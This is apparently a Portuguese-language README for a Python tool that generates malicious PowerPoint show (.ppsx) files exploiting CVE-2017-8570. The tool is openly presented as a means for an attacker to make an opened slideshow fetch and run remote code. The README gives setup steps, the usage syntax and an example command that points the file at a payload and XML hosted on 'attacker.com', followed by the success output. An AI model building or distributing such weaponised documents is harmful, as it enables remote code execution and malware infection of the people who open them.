
Gerador de arquivos ppsx para cve-2017-8570 (baseado em bhdresh/cve-2017-8570)
Por Temesgen Yibeltal [email protected] (Baseado no código de https://github.com/bhdresh/CVE-2017-8570 (agora removido))
ppsx-file-generator é uma ferramenta Python que gera um arquivo de apresentação de slides do PowerPoint que executa código de uma fonte remota com base em um arquivo existente.
A ferramenta gera um arquivo de apresentação de slides do PowerPoint e um arquivo XML com base na entrada fornecida. O arquivo do PowerPoint acessa o arquivo XML, que contém informações do arquivo de payload. Um atacante pode hospedar o arquivo XML e o payload em um servidor local ou público e fornecer a URL de cada um como entrada.
Primeiro, obtenha o código:
git clone https://github.com/temesgeny/ppsx-file-generator.git
ppsx-file-generator é escrito em Python e requer o zipfile, que pode ser instalado usando o Pip:
pip install zipfile
Requer Microsoft Office Power Point para realizar esta tarefa.
Primeiro abra o Microsoft Office Power Point e abra 'template.ppsx'. Abra seu próprio arquivo de apresentação e copie o ícone 'Coder.exe' de template.ppsx para o slide 1 do seu arquivo do Power Point. Salve o arquivo como Power Point Show (.ppsx). Em seguida, use a ferramenta Python da seguinte forma:
Uso: generate_ppsx.py input_filename -o output_filename -p payload_uri -x xml_uri
input_filename O nome do arquivo ppsx de entrada.
-o Nome do arquivo .ppsx de saída, (inclua o .ppsx).
-p A URL do arquivo de payload exe ou sct.
Deve estar em um servidor web acessível. (Opcional para o arquivo xml)
-x A URI xml completa a ser chamada pelo arquivo ppsx.
Deve estar em um servidor web acessível.(Obrigatório)
python generate_ppsx.py -o output.ppsx -p http://attacker.com/payload.exe -x http://attacker.com/content.xml input.ppsx
content.xml gerado com sucesso
output.ppsx gerado com sucesso